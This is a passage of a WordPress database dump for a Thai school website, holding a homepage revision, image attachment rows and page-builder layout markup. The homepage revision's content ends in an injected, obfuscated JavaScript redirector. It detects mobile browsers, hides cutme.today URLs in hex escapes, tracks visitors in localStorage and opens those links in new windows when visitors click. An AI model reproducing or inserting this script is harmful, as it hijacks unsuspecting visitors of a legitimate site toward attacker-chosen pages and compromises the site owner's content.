|_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','14-revision-v1','','','2024-07-27 12:34:12','2024-07-27 05:34:12','',14,'http://pakhaeng.ssk.in.th/?p=159',0,'revision','',0),
(164,1,'2024-07-27 22:29:15','2024-07-27 15:29:15','','1-2566','','inherit','','closed','','1-2566','','','2024-07-27 22:29:15','2024-07-27 15:29:15','',0,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/1-2566.png',0,'attachment','image/png',0),
(167,1,'2024-07-27 22:33:13','2024-07-27 15:33:13','','1-2566','','inherit','','closed','','1-2566-2','','','2024-07-27 22:33:13','2024-07-27 15:33:13','',0,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/1-2566-1.png',0,'attachment','image/png',0),
(168,1,'2024-07-27 22:33:15','2024-07-27 15:33:15','','2-2566','','inherit','','closed','','2-2566','','','2024-07-27 22:33:15','2024-07-27 15:33:15','',0,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/2-2566.png',0,'attachment','image/png',0),
(169,1,'2024-07-27 22:33:18','2024-07-27 15:33:18','','3-1-2566','','inherit','','closed','','3-1-2566','','','2024-07-27 22:33:18','2024-07-27 15:33:18','',0,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/3-1-2566.png',0,'attachment','image/png',0),
(170,1,'2024-07-27 22:33:20','2024-07-27 15:33:20','','3-2-2566','','inherit','','closed','','3-2-2566','','','2024-07-27 22:33:20','2024-07-27 15:33:20','',0,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/3-2-2566.png',0,'attachment','image/png',0),
(171,1,'2024-07-27 22:33:22','2024-07-27 15:33:22','','4-2566','','inherit','','closed','','4-2566','','','2024-07-27 22:33:22','2024-07-27 15:33:22','',0,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/4-2566.png',0,'attachment','image/png',0),
(172,1,'2024-07-27 22:33:24','2024-07-27 15:33:24','','5-2566','','inherit','','closed','','5-2566','','','2024-07-27 22:33:24','2024-07-27 15:33:24','',0,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/5-2566.png',0,'attachment','image/png',0),
(173,1,'2024-07-27 22:33:27','2024-07-27 15:33:27','','6-2566','','inherit','','closed','','6-2566','','','2024-07-27 22:33:27','2024-07-27 15:33:27','',0,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/6-2566.png',0,'attachment','image/png',0),
(174,1,'2024-07-27 22:33:29','2024-07-27 15:33:29','','7-2566','','inherit','','closed','','7-2566','','','2024-07-27 22:33:29','2024-07-27 15:33:29','',0,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/7-2566.png',0,'attachment','image/png',0),
(175,1,'2024-07-27 22:33:31','2024-07-27 15:33:31','','8-2566','','inherit','','closed','','8-2566','','','2024-07-27 22:33:31','2024-07-27 15:33:31','',0,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/8-2566.png',0,'attachment','image/png',0),
(176,1,'2024-07-27 22:33:34','2024-07-27 15:33:34','','9-2566','','inherit','','closed','','9-2566','','','2024-07-27 22:33:34','2024-07-27 15:33:34','',0,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/9-2566.png',0,'attachment','image/png',0),
(177,1,'2024-07-27 22:33:36','2024-07-27 15:33:36','','10-2566','','inherit','','closed','','10-2566','','','2024-07-27 22:33:36','2024-07-27 15:33:36','',0,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/10-2566.png',0,'attachment','image/png',0),
(178,1,'2024-07-27 22:33:39','2024-07-27 15:33:39','','11-2566','','inherit','','closed','','11-2566','','','2024-07-27 22:33:39','2024-07-27 15:33:39','',0,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/11-2566.png',0,'attachment','image/png',0),
(179,1,'2024-07-27 22:33:41','2024-07-27 15:33:41','','12-2566','','inherit','','closed','','12-2566','','','2024-07-27 22:33:41','2024-07-27 15:33:41','',0,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/12-2566.png',0,'attachment','image/png',0),
(180,1,'2024-07-27 22:33:44','2024-07-27 15:33:44','','13-2566','','inherit','','closed','','13-2566','','','2024-07-27 22:33:44','2024-07-27 15:33:44','',0,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/13-2566.png',0,'attachment','image/png',0),
(181,1,'2024-07-27 22:33:46','2024-07-27 15:33:46','','14-2566','','inherit','','closed','','14-2566','','','2024-07-27 22:33:46','2024-07-27 15:33:46','',0,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/14-2566.png',0,'attachment','image/png',0),
(182,1,'2024-07-27 22:33:48','2024-07-27 15:33:48','','15-2566','','inherit','','closed','','15-2566','','','2024-07-27 22:33:48','2024-07-27 15:33:48','',0,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/15-2566.png',0,'attachment','image/png',0),
(183,1,'2024-07-27 22:33:50','2024-07-27 15:33:50','','16-2566','','inherit','','closed','','16-2566','','','2024-07-27 22:33:50','2024-07-27 15:33:50','',0,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/16-2566.png',0,'attachment','image/png',0),
(184,1,'2024-07-27 22:33:52','2024-07-27 15:33:52','','17-2566','','inherit','','closed','','17-2566','','','2024-07-27 22:33:52','2024-07-27 15:33:52','',0,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/17-2566.png',0,'attachment','image/png',0),
(186,1,'2024-07-27 22:36:27','2024-07-27 15:36:27','<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_b8ea4f-02\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_235c2e-aa\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_235c2e-aa\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"67990d4f\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e53f332c\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingBottom\":\"10px\"}} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"f2a87680\",\"mediaId\":23,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-f2a87680\"><img class=\"gb-image gb-image-f2a87680\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/โรงเรียนบ้านโคกสะอาด.png\" alt=\"โรงเรียนบ้านหนองปลาเข็ง-กอไหล่\" title=\"โรงเรียนบ้านหนองปลาเข็ง-กอไหล่\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"ff644ddb\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_f7576b-fd\",\"columns\":[4,4,4,3,2,2],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":30,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/ผอ-1.png\" alt=\"\" title=\"ผอ 1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"14_bc537f-5a\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns14_bc537f-5a\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"14_1da0eb-4e\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"sizePreset\":\"small\",\"background\":\"#0a71ad\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#0a71ad\",\"backgroundColorHover\":\"#8ed1fc\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"14_add57c-9d\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items14_add57c-9d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"14_745a05-5a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_745a05-5a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลพื้นฐาน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_1e894c-db\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_1e894c-db\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ประวัติโรงเรียน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_3cdb23-c1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_3cdb23-c1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_92a3d1-5f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_92a3d1-5f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">กรรมการสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_225b86-42\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_225b86-42\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลผู้บริหาร</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_e92ee9-59\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_e92ee9-59\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลบุคลากร</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_91c788-64\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_91c788-64\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลนักเรียน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_5a5d38-a9\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_5a5d38-a9\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูล O-NET</span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/headline {\"uniqueId\":\"0ec6139a\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"22px\"}} -->\n<h2 class=\"gb-headline gb-headline-0ec6139a gb-headline-text\"><strong>VTR กิจกรรมโรงเรียน</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/grid {\"uniqueId\":\"19bd4464\",\"columns\":2,\"horizontalGap\":20,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"2cef18b9\",\"isGrid\":true,\"gridId\":\"19bd4464\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:video {\"id\":138} -->\n<figure class=\"wp-block-video\"><video controls poster=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/448905004_973201524597519_7994539186753533290_n-1.jpg\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/สุนทนภู่.mp4\"></video></figure>\n<!-- /wp:video -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"66a01ab5\",\"isGrid\":true,\"gridId\":\"19bd4464\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:video {\"id\":142} -->\n<figure class=\"wp-block-video\"><video controls poster=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/Untitled.png\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/สุขาดี.mp4\"></video></figure>\n<!-- /wp:video -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid --></div>\n<!-- /wp:group -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":{\"md\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingBgColor\":\"#6096b4\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} 